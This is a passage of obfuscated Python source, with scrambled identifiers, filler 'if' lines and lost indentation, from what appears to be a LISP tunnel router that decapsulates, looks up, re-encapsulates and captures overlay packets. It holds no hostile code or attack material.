if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if ( oO0OOOO0 . lisp_header . get_instance_id ( ) == 0xffffff ) :
O00oO000O0O = lisp . lisp_control_header ( )
O00oO000O0O . decode ( oO0OOOO0 . packet )
if ( O00oO000O0O . is_info_request ( ) ) :
I1i1i1iii = lisp . lisp_info ( )
I1i1i1iii . decode ( oO0OOOO0 . packet )
I1i1i1iii . print_info ( )
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
I11ii1IIiIi = I1i1i1iii . hostname if ( I1i1i1iii . hostname != None ) else ""
OoOOo0OOoO = oO0OOOO0 . outer_source
ooO0O00Oo0o = oO0OOOO0 . udp_sport
if ( lisp . lisp_store_nat_info ( I11ii1IIiIi , OoOOo0OOoO , ooO0O00Oo0o ) ) :
i1I1iI1iIi111i ( II1iII1i , I11ii1IIiIi , OoOOo0OOoO , ooO0O00Oo0o )
if 65 - 65: I1ii11iIi11i . I11i - I1Ii111 * IiII / I1Ii111 / ooOoO0o
else :
OO = oO0OOOO0 . outer_source . print_address_no_iid ( )
OoOoO = oO0OOOO0 . outer_ttl
oO0OOOO0 = oO0OOOO0 . packet
if ( lisp . lisp_is_rloc_probe_request ( oO0OOOO0 [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( oO0OOOO0 [ 28 ] ) == False ) : OoOoO = - 1
oO0OOOO0 = oO0OOOO0 [ 28 : : ]
lisp . lisp_parse_packet ( II1iII1i , oO0OOOO0 , OO , 0 , OoOoO )
if 40 - 40: ooOoO0o * IiII * i11iIiiIii
return
if 57 - 57: ooOoO0o
if 29 - 29: OoOoOO00 - IiII * OoooooooOO + OoooooooOO . II111iiii + OoooooooOO
if 74 - 74: Ii1I - IiII / iII111i * O0 - OOooOOo
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( oO0OOOO0 . packet ) )
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if ( oO0OOOO0 . inner_dest . is_mac ( ) ) :
oO0OOOO0 . packet = lisp . lisp_mac_input ( oO0OOOO0 . packet )
if ( oO0OOOO0 . packet == None ) : return
oO0OOOO0 . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( oO0OOOO0 . inner_version == 4 ) :
oO0OOOO0 . packet = lisp . lisp_ipv4_input ( oO0OOOO0 . packet )
if ( oO0OOOO0 . packet == None ) : return
oO0OOOO0 . inner_ttl = oO0OOOO0 . outer_ttl
elif ( oO0OOOO0 . inner_version == 6 ) :
oO0OOOO0 . packet = lisp . lisp_ipv6_input ( oO0OOOO0 )
if ( oO0OOOO0 . packet == None ) : return
oO0OOOO0 . inner_ttl = oO0OOOO0 . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
Ii1Iii1iIi = lisp . lisp_map_cache_lookup ( oO0OOOO0 . inner_source , oO0OOOO0 . inner_dest )
if 82 - 82: I1ii11iIi11i / I1IiiI % iIii1I11I1II1 / i1IIi - I1IiiI
if 7 - 7: I1Ii111 * OoO0O00 - ooOoO0o + OOooOOo * I1IiiI % OoO0O00
if 15 - 15: OoOoOO00 % I1IiiI * I11i
if 81 - 81: ooOoO0o - iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * I11i
if 20 - 20: oO0o % IiII
if ( Ii1Iii1iIi and ( Ii1Iii1iIi . action == lisp . LISP_NATIVE_FORWARD_ACTION or
Ii1Iii1iIi . eid . address == 0 ) ) :
III1i1i11i = lisp . lisp_db_for_lookups . lookup_cache ( oO0OOOO0 . inner_source , False )
if ( III1i1i11i and III1i1i11i . secondary_iid ) :
oOo0 = oO0OOOO0 . inner_dest
oOo0 . instance_id = III1i1i11i . secondary_iid
Ii1Iii1iIi = lisp . lisp_map_cache_lookup ( oO0OOOO0 . inner_source , oOo0 )
if 56 - 56: o0oOOo0O0Ooo + II111iiii + OoOoOO00 - ooOoO0o . OoOoOO00
if 84 - 84: OoO0O00 + i1IIi - II111iiii . I1ii11iIi11i * OoooooooOO + I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if ( Ii1Iii1iIi == None or Ii1Iii1iIi . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( oO0OOOO0 . inner_source ,
oO0OOOO0 . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , II1Ii1iI1i ,
oO0OOOO0 . inner_source , oO0OOOO0 . inner_dest , None )
return
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if ( Ii1Iii1iIi and Ii1Iii1iIi . is_active ( ) and Ii1Iii1iIi . has_ttl_elapsed ( ) ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( Ii1Iii1iIi . print_eid_tuple ( ) , False ) ) )
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
lisp . lisp_send_map_request ( II1iII1i , II1Ii1iI1i ,
oO0OOOO0 . inner_source , oO0OOOO0 . inner_dest , None )
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
Ii1Iii1iIi . stats . increment ( len ( oO0OOOO0 . packet ) )
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
o00o0 , II1I , II1I1I1Ii , OOOOoO00o0O , I1I1I1IIi1III = Ii1Iii1iIi . select_rloc ( oO0OOOO0 , None )
if 5 - 5: Oo0Ooo % ooOoO0o % i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - I1ii11iIi11i
if ( o00o0 == None and I1I1I1IIi1III == None ) :
if ( OOOOoO00o0O == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
oO0OOOO0 . send_packet ( iiI1iIiI , oO0OOOO0 . inner_dest )
return
if 45 - 45: I1ii11iIi11i % I1IiiI - i11iIiiIii
lisp . dprint ( "No reachable RLOCs found" )
return
if 11 - 11: iIii1I11I1II1 * iIii1I11I1II1 * I1IiiI
if ( o00o0 and o00o0 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
return
if 46 - 46: OoOoOO00 + OoO0O00
if 70 - 70: iII111i / iIii1I11I1II1
if 85 - 85: OoooooooOO % i1IIi * OoooooooOO / I1ii11iIi11i
if 96 - 96: OoooooooOO + oO0o
if 44 - 44: oO0o
oO0OOOO0 . outer_tos = oO0OOOO0 . inner_tos
oO0OOOO0 . outer_ttl = oO0OOOO0 . inner_ttl
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
if 88 - 88: OoOoOO00 / II111iiii
if 87 - 87: I1ii11iIi11i - I1ii11iIi11i - iII111i + oO0o
if 82 - 82: oO0o / iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if ( o00o0 ) :
oO0OOOO0 . encap_port = II1I
if ( II1I == 0 ) : oO0OOOO0 . encap_port = lisp . LISP_DATA_PORT
oO0OOOO0 . outer_dest . copy_address ( o00o0 )
iiI1I1 = oO0OOOO0 . outer_dest . afi_to_version ( )
oO0OOOO0 . outer_version = iiI1I1
ooO = lisp . lisp_myrlocs [ 0 ] if ( iiI1I1 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 6 - 6: iIii1I11I1II1 . ooOoO0o % o0oOOo0O0Ooo
oO0OOOO0 . outer_source . copy_address ( ooO )
if 50 - 50: iII111i + O0 + Ii1I . II111iiii / o0oOOo0O0Ooo
if 17 - 17: Ii1I % iIii1I11I1II1 - iIii1I11I1II1
if 78 - 78: iII111i + I11i . ooOoO0o - iII111i . Ii1I
if 30 - 30: I1IiiI + OoO0O00 % Ii1I * iII111i / Oo0Ooo - I11i
if ( oO0OOOO0 . encode ( II1I1I1Ii ) == None ) : return
if ( len ( oO0OOOO0 . packet ) <= 1500 ) : oO0OOOO0 . print_packet ( "Send" , True )
if 64 - 64: iIii1I11I1II1
if 21 - 21: Oo0Ooo . II111iiii
if 54 - 54: II111iiii % II111iiii
if 86 - 86: O0 % Ii1I * ooOoO0o * iIii1I11I1II1 * i1IIi * I11i
OOOoOOO0oO = OOo if iiI1I1 == 6 else iiI1iIiI
oO0OOOO0 . send_packet ( OOOoOOO0oO , oO0OOOO0 . outer_dest )
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
elif ( I1I1I1IIi1III ) :
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
if 46 - 46: IiII
ii1iIi1iIiI1i = len ( oO0OOOO0 . packet )
for iiI1iIii1i in I1I1I1IIi1III . rle_forwarding_list :
oO0OOOO0 . outer_dest . copy_address ( iiI1iIii1i . address )
oO0OOOO0 . encap_port = lisp . LISP_DATA_PORT if iiI1iIii1i . translated_port == 0 else iiI1iIii1i . translated_port
if 70 - 70: OoO0O00 * O0 . I11i + I1IiiI . IiII
if 14 - 14: iIii1I11I1II1 % iIii1I11I1II1 * i11iIiiIii - OoO0O00 - I11i
iiI1I1 = oO0OOOO0 . outer_dest . afi_to_version ( )
oO0OOOO0 . outer_version = iiI1I1
ooO = lisp . lisp_myrlocs [ 0 ] if ( iiI1I1 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 63 - 63: OoO0O00
oO0OOOO0 . outer_source . copy_address ( ooO )
if 69 - 69: iIii1I11I1II1 . I1ii11iIi11i % ooOoO0o + iIii1I11I1II1 / O0 / I1ii11iIi11i
if ( oO0OOOO0 . encode ( None ) == None ) : return
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
oO0OOOO0 . print_packet ( "Replicate-to-L{}" . format ( iiI1iIii1i . level ) , True )
oO0OOOO0 . send_packet ( iiI1iIiI , oO0OOOO0 . outer_dest )
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
if 60 - 60: ooOoO0o * iIii1I11I1II1 * I1ii11iIi11i * Oo0Ooo
if 69 - 69: Ii1I * O0 . i11iIiiIii / Ii1I . o0oOOo0O0Ooo
if 63 - 63: I11i + o0oOOo0O0Ooo . II111iiii - I1IiiI
oOOO00o000o = len ( oO0OOOO0 . packet ) - ii1iIi1iIiI1i
oO0OOOO0 . packet = oO0OOOO0 . packet [ oOOO00o000o : : ]
if 9 - 9: oO0o + I11i / I11i
if ( lisp . lisp_flow_logging ) : oO0OOOO0 = copy . deepcopy ( oO0OOOO0 )
if 12 - 12: OoooooooOO % o0oOOo0O0Ooo * I11i % iIii1I11I1II1 / Ii1I
if 27 - 27: i11iIiiIii % II111iiii % I11i . O0 - Oo0Ooo + OoOoOO00
if 57 - 57: iIii1I11I1II1 / I11i - i1IIi
if 51 - 51: IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
del ( oO0OOOO0 )
return
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
if 97 - 97: I1IiiI / iII111i
if 71 - 71: II111iiii / i1IIi . I1ii11iIi11i % OoooooooOO . OoOoOO00
def Iiiiii111i1ii ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 25 - 25: OOooOOo - ooOoO0o / i11iIiiIii
if 41 - 41: i1IIi % iII111i + iIii1I11I1II1
if 2 - 2: iIii1I11I1II1 * Oo0Ooo % oO0o - II111iiii - iII111i
if 3 - 3: I1Ii111
oO0OOOO0 = lisp_thread . input_queue . get ( )
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
lisp_thread . input_stats . increment ( len ( oO0OOOO0 ) )
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
lisp_thread . lisp_packet . packet = oO0OOOO0
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
O0O ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 92 - 92: I11i . I1Ii111
return
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
def o0 ( thread ) :
iiiI1I1iIIIi1 = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( iiiI1I1iIIIi1 ) == thread . thread_number )
if 17 - 17: iIii1I11I1II1 . OoooooooOO / I11i % II111iiii % i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
def OO0 ( parms , not_used , packet ) :
if ( o0 ( parms [ 1 ] ) == False ) : return
if 44 - 44: iII111i - I1Ii111 / O0 * Oo0Ooo + II111iiii / OoOoOO00
OOOOoO000 = parms [ 0 ]
oOOOO = parms [ 1 ]
Ii = oOOOO . number_of_worker_threads
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
oOOOO . input_stats . increment ( len ( packet ) )
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
iIi1II = 4 if OOOOoO000 == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ iIi1II : : ]
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if ( Ii ) :
iI11I = oOOOO . input_stats . packet_count % Ii
iI11I = iI11I + ( len ( OOo000 ) - Ii )
I1IIIiii1 = OOo000 [ iI11I ]
I1IIIiii1 . input_queue . put ( packet )
else :
oOOOO . lisp_packet . packet = packet
O0O ( oOOOO . lisp_packet , oOOOO . thread_name )
if 65 - 65: I11i / II111iiii * Ii1I . iII111i * oO0o % OOooOOo
return
if 69 - 69: ooOoO0o - OoO0O00 / i11iIiiIii + I1ii11iIi11i % OoooooooOO
if 73 - 73: Ii1I - I1Ii111
if 68 - 68: iII111i * OoooooooOO * iIii1I11I1II1 . II111iiii
if 81 - 81: OOooOOo / O0 + I11i + Ii1I / I1IiiI
if 27 - 27: OoOoOO00 * IiII
if 59 - 59: IiII . IiII - II111iiii + IiII . i1IIi . OoO0O00
if 57 - 57: I1IiiI + Ii1I % oO0o + oO0o / II111iiii . Ii1I
def I1iIII1 ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 39 - 39: OoooooooOO
OOOOoO000 = "lo0" if lisp . lisp_is_macos ( ) else "any"
if 38 - 38: I1IiiI
oOo0OoOOo0 = pcappy . open_live ( OOOOoO000 , 9000 , 0 , 100 )
if 30 - 30: I1ii11iIi11i % I1IiiI
O0Oo00 = "(dst host "
ii1IiIIi1i = ""
for oO0OOoO0 in lisp . lisp_get_all_addresses ( ) :
O0Oo00 += "{} or " . format ( oO0OOoO0 )
ii1IiIIi1i += "{} or " . format ( oO0OOoO0 )
if 54 - 54: ooOoO0o
O0Oo00 = O0Oo00 [ 0 : - 4 ]
O0Oo00 += ") and ((udp dst port 4341 or 8472 or 4789) or "
O0Oo00 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
ii1IiIIi1i = ii1IiIIi1i [ 0 : - 4 ]
O0Oo00 += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( ii1IiIIi1i )
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
lisp . lprint ( "Capturing packets for: '{}'" . format ( O0Oo00 ) )
oOo0OoOOo0 . filter = O0Oo00
if 19 - 19: II111iiii * IiII + Ii1I
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
if 19 - 19: i11iIiiIii + iII111i % ooOoO0o
if 14 - 14: OoO0O00 . II111iiii . I11i / Ii1I % I1ii11iIi11i - ooOoO0o
oOo0OoOOo0 . loop ( - 1 , OO0 , [ OOOOoO000 , lisp_thread ] )
return
if 67 - 67: I11i - OOooOOo . i1IIi
if 35 - 35: iII111i + ooOoO0o - oO0o . iII111i . IiII
if 87 - 87: OoOoOO00
if 25 - 25: i1IIi . OoO0O00 - OoOoOO00 / OoO0O00 % OoO0O00 * iIii1I11I1II1
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
def OO0oo ( ) :
lisp . lisp_set_exception ( )
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
for o000O0o in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for OO000o00 in o000O0o : del ( OO000o00 )
if 46 - 46: OoO0O00
lisp . lisp_crypto_keys_by_nonce = { }
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
Ii1IIii11 = threading . Timer ( 60 , OO0oo , [ ] )
Ii1IIii11 . start ( )
return
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
def iiI1i1Iii111 ( ) :
global oO0oIIII , II1iII1i , i111I
global iiI1iIiI , OOo , OOo000
global Oo0oO0oo0oO00
if 43 - 43: o0oOOo0O0Ooo
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
OOOooo0OooOoO = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
i111I = lisp . lisp_open_listen_socket ( OOOooo0OooOoO ,
str ( II1Ii1iI1i ) )
oO0oIIII = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 91 - 91: oO0o + I1IiiI
II1iII1i [ 0 ] = i111I
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
II1iII1i [ 2 ] = oO0oIIII
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
iiI1iIiI = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
iiI1iIiI . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
II1iII1i . append ( iiI1iIiI )
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if ( lisp . lisp_is_raspbian ( ) == False ) :
OOo = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
OOoo0oo = os . getenv ( "LISP_PCAP_THREADS" )
OOoo0oo = 1 if ( OOoo0oo == None ) else int ( OOoo0oo )
ooOooo0OO = os . getenv ( "LISP_WORKER_THREADS" )
ooOooo0OO = 0 if ( ooOooo0OO == None ) else int ( ooOooo0OO )
if 2 - 2: II111iiii - OoO0O00 . IiII * iII111i / oO0o
if 80 - 80: OOooOOo / I11i / OoOoOO00 + i1IIi - Oo0Ooo
if 11 - 11: o0oOOo0O0Ooo * OoO0O00
if 15 - 15: OoOoOO00
for oOoOoO000OO in range ( OOoo0oo ) :
ii11II11 = lisp . lisp_thread ( "pcap-{}" . format ( oOoOoO000OO ) )
ii11II11 . thread_number = oOoOoO000OO
ii11II11 . number_of_pcap_threads = OOoo0oo
ii11II11 . number_of_worker_threads = ooOooo0OO
OOo000 . append ( ii11II11 )
threading . Thread ( target = I1iIII1 , args = [ ii11II11 ] ) . start ( )
if 70 - 70: iIii1I11I1II1
if 48 - 48: II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
for oOoOoO000OO in range ( ooOooo0OO ) :
ii11II11 = lisp . lisp_thread ( "worker-{}" . format ( oOoOoO000OO ) )
OOo000 . append ( ii11II11 )
threading . Thread ( target = Iiiiii111i1ii , args = [ ii11II11 ] ) . start ( )
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
lisp . lisp_load_checkpoint ( )
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
Ii1IIii11 = threading . Timer ( 60 , OO0oo , [ ] )
Ii1IIii11 . start ( )
return ( True )
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
def I11I ( ) :
